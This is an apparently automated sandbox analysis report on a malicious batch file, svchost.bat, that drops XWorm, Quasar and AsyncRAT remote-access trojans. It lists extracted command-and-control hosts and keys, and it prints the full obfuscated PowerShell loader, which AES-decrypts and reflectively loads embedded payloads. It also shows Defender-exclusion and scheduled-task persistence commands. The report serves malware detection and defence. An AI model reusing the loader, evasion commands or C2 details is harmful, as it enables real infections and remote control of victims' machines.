Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
02-07-2024 13:15
Static task
static1
General
-
Target
svchost.bat
-
Size
608KB
-
MD5
0598b47f8cba2aa8042d5241594a2a18
-
SHA1
2f9923a0cd52476a33e005156675c19d445a627f
-
SHA256
edd1a3237614dc5b6554baaf7f937285850b22b294bfe506309549cb4f62984e
-
SHA512
146fb2f4ba190434ac42c22054c992fd4276da789145401fab9702e3e8cb140194be5c49bc00b20de58557f0d3e4425e80029113fc2cd55dcdc5dbb59306ccd1
-
SSDEEP
12288:NK2Dh0mFsRXQ7ZpK1b4Bdbi6EGv8/K9yxnQ3nzvc7l87wrJJ3HMU:Nhjsxb4B0KAxnww7y7+v
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Extracted
xworm
super-nearest.gl.at.ply.gg:17835
best-bird.gl.at.ply.gg:27196
wiz.bounceme.net:6000
-
Install_directory
%ProgramData%
Extracted
asyncrat
Default
finally-grande.gl.at.ply.gg:25844
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
quasar
3.1.5
Slave
stop-largely.gl.at.ply.gg:27116
$Sxr-kl1r656AGsPQksTmi8
-
encryption_key
WyBm1iVkHZmEnGPMAZWV
-
install_name
$phantom.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
$phantomSTARTUP~MSF
-
subdirectory
$phantom
Signatures
-
Detect Xworm Payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/1248-16-0x000001E19F3C0000-0x000001E19F476000-memory.dmp family_xworm behavioral1/memory/4720-59-0x0000026E76B80000-0x0000026E76B98000-memory.dmp family_xworm C:\Users\Admin\AppData\Local\Temp\7zip.exe family_xworm behavioral1/memory/2416-99-0x0000000000A60000-0x0000000000A7A000-memory.dmp family_xworm behavioral1/memory/2416-201-0x0000000002C80000-0x0000000002C8E000-memory.dmp family_xworm -
Quasar payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1248-16-0x000001E19F3C0000-0x000001E19F476000-memory.dmp family_quasar C:\Users\Admin\AppData\Local\Temp\wininit.exe family_quasar behavioral1/memory/2196-103-0x0000000000A40000-0x0000000000AAC000-memory.dmp family_quasar -
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1248-16-0x000001E19F3C0000-0x000001E19F476000-memory.dmp family_asyncrat C:\Users\Admin\AppData\Local\Temp\conhost.exe family_asyncrat -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 39 4720 powershell.exe 48 4720 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4388 powershell.exe 4956 powershell.exe 4728 powershell.exe 3152 powershell.exe 3432 powershell.exe 2060 powershell.exe 2236 powershell.exe 4720 powershell.exe 1248 powershell.exe 4348 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exe7zip.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation 7zip.exe -
Drops startup file 2 IoCs
Processes:
7zip.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7zip.lnk 7zip.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7zip.lnk 7zip.exe -
Executes dropped EXE 7 IoCs
Processes:
Windows PowerShell.exe7zip.execonhost.exewininit.exe7zip.exe7zip.exe7zip.exepid process 2148 Windows PowerShell.exe 2416 7zip.exe 4536 conhost.exe 2196 wininit.exe 3008 7zip.exe 1348 7zip.exe 3312 7zip.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
7zip.exepowershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7zip = "C:\\ProgramData\\7zip.exe" 7zip.exe Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WINDOWSBIOS = "C:\\ProgramData\\WINDOWSBIOS .COM" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 18 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 3412 schtasks.exe 3468 schtasks.exe 2564 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exeWindows PowerShell.exepid process 1248 powershell.exe 1248 powershell.exe 4348 powershell.exe 4348 powershell.exe 4720 powershell.exe 4720 powershell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe 2148 Windows PowerShell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1248 powershell.exe Token: SeDebugPrivilege 4348 powershell.exe Token: SeIncreaseQuotaPrivilege 4348 powershell.exe Token: SeSecurityPrivilege 4348 powershell.exe Token: SeTakeOwnershipPrivilege 4348 powershell.exe Token: SeLoadDriverPrivilege 4348 powershell.exe Token: SeSystemProfilePrivilege 4348 powershell.exe Token: SeSystemtimePrivilege 4348 powershell.exe Token: SeProfSingleProcessPrivilege 4348 powershell.exe Token: SeIncBasePriorityPrivilege 4348 powershell.exe Token: SeCreatePagefilePrivilege 4348 powershell.exe Token: SeBackupPrivilege 4348 powershell.exe Token: SeRestorePrivilege 4348 powershell.exe Token: SeShutdownPrivilege 4348 powershell.exe Token: SeDebugPrivilege 4348 powershell.exe Token: SeSystemEnvironmentPrivilege 4348 powershell.exe Token: SeRemoteShutdownPrivilege 4348 powershell.exe Token: SeUndockPrivilege 4348 powershell.exe Token: SeManageVolumePrivilege 4348 powershell.exe Token: 33 4348 powershell.exe Token: 34 4348 powershell.exe Token: 35 4348 powershell.exe Token: 36 4348 powershell.exe Token: SeIncreaseQuotaPrivilege 4348 powershell.exe Token: SeSecurityPrivilege 4348 powershell.exe Token: SeTakeOwnershipPrivilege 4348 powershell.exe Token: SeLoadDriverPrivilege 4348 powershell.exe Token: SeSystemProfilePrivilege 4348 powershell.exe Token: SeSystemtimePrivilege 4348 powershell.exe Token: SeProfSingleProcessPrivilege 4348 powershell.exe Token: SeIncBasePriorityPrivilege 4348 powershell.exe Token: SeCreatePagefilePrivilege 4348 powershell.exe Token: SeBackupPrivilege 4348 powershell.exe Token: SeRestorePrivilege 4348 powershell.exe Token: SeShutdownPrivilege 4348 powershell.exe Token: SeDebugPrivilege 4348 powershell.exe Token: SeSystemEnvironmentPrivilege 4348 powershell.exe Token: SeRemoteShutdownPrivilege 4348 powershell.exe Token: SeUndockPrivilege 4348 powershell.exe Token: SeManageVolumePrivilege 4348 powershell.exe Token: 33 4348 powershell.exe Token: 34 4348 powershell.exe Token: 35 4348 powershell.exe Token: 36 4348 powershell.exe Token: SeIncreaseQuotaPrivilege 4348 powershell.exe Token: SeSecurityPrivilege 4348 powershell.exe Token: SeTakeOwnershipPrivilege 4348 powershell.exe Token: SeLoadDriverPrivilege 4348 powershell.exe Token: SeSystemProfilePrivilege 4348 powershell.exe Token: SeSystemtimePrivilege 4348 powershell.exe Token: SeProfSingleProcessPrivilege 4348 powershell.exe Token: SeIncBasePriorityPrivilege 4348 powershell.exe Token: SeCreatePagefilePrivilege 4348 powershell.exe Token: SeBackupPrivilege 4348 powershell.exe Token: SeRestorePrivilege 4348 powershell.exe Token: SeShutdownPrivilege 4348 powershell.exe Token: SeDebugPrivilege 4348 powershell.exe Token: SeSystemEnvironmentPrivilege 4348 powershell.exe Token: SeRemoteShutdownPrivilege 4348 powershell.exe Token: SeUndockPrivilege 4348 powershell.exe Token: SeManageVolumePrivilege 4348 powershell.exe Token: 33 4348 powershell.exe Token: 34 4348 powershell.exe Token: 35 4348 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
wininit.exepowershell.exe7zip.exepid process 2196 wininit.exe 4720 powershell.exe 2416 7zip.exe -
Suspicious use of WriteProcessMemory 45 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exewininit.exe7zip.exedescription pid process target process PID 1552 wrote to memory of 3220 1552 cmd.exe cmd.exe PID 1552 wrote to memory of 3220 1552 cmd.exe cmd.exe PID 1552 wrote to memory of 1248 1552 cmd.exe powershell.exe PID 1552 wrote to memory of 1248 1552 cmd.exe powershell.exe PID 1248 wrote to memory of 4348 1248 powershell.exe powershell.exe PID 1248 wrote to memory of 4348 1248 powershell.exe powershell.exe PID 1248 wrote to memory of 3060 1248 powershell.exe WScript.exe PID 1248 wrote to memory of 3060 1248 powershell.exe WScript.exe PID 3060 wrote to memory of 4832 3060 WScript.exe cmd.exe PID 3060 wrote to memory of 4832 3060 WScript.exe cmd.exe PID 4832 wrote to memory of 2428 4832 cmd.exe cmd.exe PID 4832 wrote to memory of 2428 4832 cmd.exe cmd.exe PID 4832 wrote to memory of 4720 4832 cmd.exe powershell.exe PID 4832 wrote to memory of 4720 4832 cmd.exe powershell.exe PID 4720 wrote to memory of 2148 4720 powershell.exe Windows PowerShell.exe PID 4720 wrote to memory of 2148 4720 powershell.exe Windows PowerShell.exe PID 4720 wrote to memory of 2148 4720 powershell.exe Windows PowerShell.exe PID 4720 wrote to memory of 2416 4720 powershell.exe 7zip.exe PID 4720 wrote to memory of 2416 4720 powershell.exe 7zip.exe PID 4720 wrote to memory of 4536 4720 powershell.exe conhost.exe PID 4720 wrote to memory of 4536 4720 powershell.exe conhost.exe PID 4720 wrote to memory of 2196 4720 powershell.exe wininit.exe PID 4720 wrote to memory of 2196 4720 powershell.exe wininit.exe PID 4720 wrote to memory of 2196 4720 powershell.exe wininit.exe PID 2196 wrote to memory of 3468 2196 wininit.exe schtasks.exe PID 2196 wrote to memory of 3468 2196 wininit.exe schtasks.exe PID 2196 wrote to memory of 3468 2196 wininit.exe schtasks.exe PID 2416 wrote to memory of 4388 2416 7zip.exe powershell.exe PID 2416 wrote to memory of 4388 2416 7zip.exe powershell.exe PID 2416 wrote to memory of 4956 2416 7zip.exe powershell.exe PID 2416 wrote to memory of 4956 2416 7zip.exe powershell.exe PID 2416 wrote to memory of 4728 2416 7zip.exe powershell.exe PID 2416 wrote to memory of 4728 2416 7zip.exe powershell.exe PID 4720 wrote to memory of 3152 4720 powershell.exe powershell.exe PID 4720 wrote to memory of 3152 4720 powershell.exe powershell.exe PID 4720 wrote to memory of 3432 4720 powershell.exe powershell.exe PID 4720 wrote to memory of 3432 4720 powershell.exe powershell.exe PID 4720 wrote to memory of 2060 4720 powershell.exe powershell.exe PID 4720 wrote to memory of 2060 4720 powershell.exe powershell.exe PID 4720 wrote to memory of 2236 4720 powershell.exe powershell.exe PID 4720 wrote to memory of 2236 4720 powershell.exe powershell.exe PID 2416 wrote to memory of 2564 2416 7zip.exe schtasks.exe PID 2416 wrote to memory of 2564 2416 7zip.exe schtasks.exe PID 4720 wrote to memory of 3412 4720 powershell.exe schtasks.exe PID 4720 wrote to memory of 3412 4720 powershell.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\svchost.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bhgsIZ9ntR3QuSTVrlc5WGQlDCUzkxlFUOsGaWn8ZvI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('noHuYoYEf1PqzBYbzxQgMQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ktoSe=New-Object System.IO.MemoryStream(,$param_var); $bKMAR=New-Object System.IO.MemoryStream; $edDvw=New-Object System.IO.Compression.GZipStream($ktoSe, [IO.Compression.CompressionMode]::Decompress); $edDvw.CopyTo($bKMAR); $edDvw.Dispose(); $ktoSe.Dispose(); $bKMAR.Dispose(); $bKMAR.ToArray();}function execute_function($param_var,$param2_var){ $lunRh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UKjYh=$lunRh.EntryPoint; $UKjYh.Invoke($null, $param2_var);}$GUFyk = 'C:\Users\Admin\AppData\Local\Temp\svchost.bat';$host.UI.RawUI.WindowTitle = $GUFyk;$AaqEv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GUFyk).Split([Environment]::NewLine);foreach ($YpNpy in $AaqEv) { if ($YpNpy.StartsWith('HstmKcMNumVqNXjUlxly')) { $PHZNA=$YpNpy.Substring(20); break; }}$payloads_var=[string[]]$PHZNA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_876_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_876.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_876.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_876.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bhgsIZ9ntR3QuSTVrlc5WGQlDCUzkxlFUOsGaWn8ZvI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('noHuYoYEf1PqzBYbzxQgMQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ktoSe=New-Object System.IO.MemoryStream(,$param_var); $bKMAR=New-Object System.IO.MemoryStream; $edDvw=New-Object System.IO.Compression.GZipStream($ktoSe, [IO.Compression.CompressionMode]::Decompress); $edDvw.CopyTo($bKMAR); $edDvw.Dispose(); $ktoSe.Dispose(); $bKMAR.Dispose(); $bKMAR.ToArray();}function execute_function($param_var,$param2_var){ $lunRh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UKjYh=$lunRh.EntryPoint; $UKjYh.Invoke($null, $param2_var);}$GUFyk = 'C:\Users\Admin\AppData\Roaming\Windows_Log_876.bat';$host.UI.RawUI.WindowTitle = $GUFyk;$AaqEv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GUFyk).Split([Environment]::NewLine);foreach ($YpNpy in $AaqEv) { if ($YpNpy.StartsWith('HstmKcMNumVqNXjUlxly')) { $PHZNA=$YpNpy.Substring(20); break; }}$payloads_var=[string[]]$PHZNA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Windows PowerShell.exe"C:\Users\Admin\AppData\Local\Temp\Windows PowerShell.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\conhost.exe"C:\Users\Admin\AppData\Local\Temp\conhost.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zip.exe"C:\Users\Admin\AppData\Local\Temp\7zip.exe"6⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zip.exe'7⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '7zip.exe'7⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\7zip.exe'7⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "7zip" /tr "C:\ProgramData\7zip.exe"7⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Users\Admin\AppData\Local\Temp\wininit.exe"C:\Users\Admin\AppData\Local\Temp\wininit.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$phantomSTARTUP~MSF" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\wininit.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WINDOWSBIOS .COM'6⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WINDOWSBIOS .COM'6⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WINDOWSBIOS " /tr "C:\ProgramData\WINDOWSBIOS .COM"6⤵
- Scheduled Task/Job: Scheduled Task
-
C:\ProgramData\7zip.exeC:\ProgramData\7zip.exe1⤵
- Executes dropped EXE
-
C:\ProgramData\7zip.exeC:\ProgramData\7zip.exe1⤵
- Executes dropped EXE
-
C:\ProgramData\7zip.exeC:\ProgramData\7zip.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\7zip.exe.logFilesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5ade8b780188478d4bf68c97bc995b06f
SHA10b5124fca500da8f833a3be98bd5f732d3962343
SHA256318ce58720b7608811b1177c41ce0f7ec0437783db8ed188acbc523d08a3646b
SHA512c9d19f196b25e62bb6f717c46ec892b18d243646afdae4b848ce30802d1df4e5576bf6328ac88ce8bca01f17fed79da778ecfeb770fe0bcc14d167ad577fcc13
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD572903459f297d1561ed59e88f6266c39
SHA122275691405b29149354de4bf3a40bd7cef6f6de
SHA25634dd19ebba6598d5f586b5c7ac30babf89d055b5f1a6e959129a39311fe4026b
SHA5126c04ccf522b8b544de9da57b791e7f4a3ff1de200f8a641de106f75270759e04ba028fd6db7e3784bb0233ac3c1f92ec3473d703b9ac585d4851d277d12db10f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD562d94562013cad250e309b4091503254
SHA1f658f6e53e980694f5ff5bae10455c21ee059a2e
SHA2561ff2d02730e490230262e82169d667b1db011b405f53b3bb4345ed1ee3efc1d5
SHA512282e6777407b759ba15e7410cefc8652ae362a5e9ae13dfb355a3044154ca018a8de2b98df0e83012ae98279480ee3b517c62d33c8122f078ea5f3732aaa2a97
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD534f595487e6bfd1d11c7de88ee50356a
SHA14caad088c15766cc0fa1f42009260e9a02f953bb
SHA2560f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA51210976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD522310ad6749d8cc38284aa616efcd100
SHA1440ef4a0a53bfa7c83fe84326a1dff4326dcb515
SHA25655b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf
SHA5122ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def
-
C:\Users\Admin\AppData\Local\Temp\7zip.exeFilesize
81KB
MD56fac9c3612488908d9aa6ed9e8234f9f
SHA18b36017162e06e76a450e2ecceee4d3a68bb3905
SHA2560ca49b53ed70a9fabe46a92daa4a134f1afaf99b9098f81e33084a95c8586606
SHA512e71b4cef4f488fc2cc771c1df5466ed6edd12d5cf3bfcf2825f0ec87bbcb66afabcba957dbfeee621e3c03e897bec1cede8d88f3c9e255b4fd40ddbdfaa5794e
-
C:\Users\Admin\AppData\Local\Temp\Windows PowerShell.exeFilesize
27KB
MD54daae2de5a31125d02b057c1ff18d58f
SHA1e1d603edfcc150a4718e2916ae3dda3aa9548dc8
SHA25625510f3aa1b879ea92a3cba9583d73e447b8765bae6dfcc4954bb72df5beaa7f
SHA5127cda96a69f9cddab307f3f08e1f38a4d059f0cc7f7119d4a48891efdb01cf101ebcc06cb2ce0702ea2d689d27ee45faddc0a13cd72503c609c4e544919549a2a
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kksidhr4.4rq.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
